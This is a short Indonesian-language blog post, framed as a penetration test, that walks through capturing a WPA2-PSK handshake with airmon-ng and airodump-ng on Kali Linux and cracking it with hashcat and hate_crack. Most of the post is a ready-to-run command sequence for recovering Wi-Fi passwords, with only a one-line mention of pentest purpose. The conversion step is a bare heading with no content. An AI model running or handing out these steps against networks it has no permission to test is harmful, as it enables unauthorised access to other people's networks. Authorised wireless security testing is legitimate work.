WPA2-PSK Hacking
Tujuan dari kegiatan pentest ini adalah mendapatkan password dari wifi dengan keamanan WPA2-PSK.
1. Connect Dongle to Kali Linux
Koneksikan dongle ke Kali Linux via USB:
1
2
# pastikan interface dongle terdeteksi (contoh: wlan0)
➜ ifconfig
2. Identify Wireless Networks
1
2
3
4
5
6
7
8
# Mengaktifkan mode monitor, biasanya nama interface akan berubah menjadi 'wlan0mon' atau tetap 'wlan0'
➜ airmon-ng start wlan0
# scan wifi, catat channel, mac & bssid
➜ airodump-ng wlan0
# clone wifi dan tunggu sampai ada WPA handshake wifi
➜ airodump-ng -c <channel> --bssid <bssid> -w <ssid> wlan0
3. Convert cap to hc22000
4. Crack the hash
1
2
➜ hashcat -m 22000 pass.hash wordlist.txt
➜ hate_crack pass.hash 22000
Referensi:
- https://github.com/ricardojoserf/wpa2-enterprise-attack
- https://purplesec.us/perform-wireless-penetration-test/
- https://tools.kali.org/wireless-attacks/hostapd-wpe
This post is licensed under CC BY 4.0 by the author.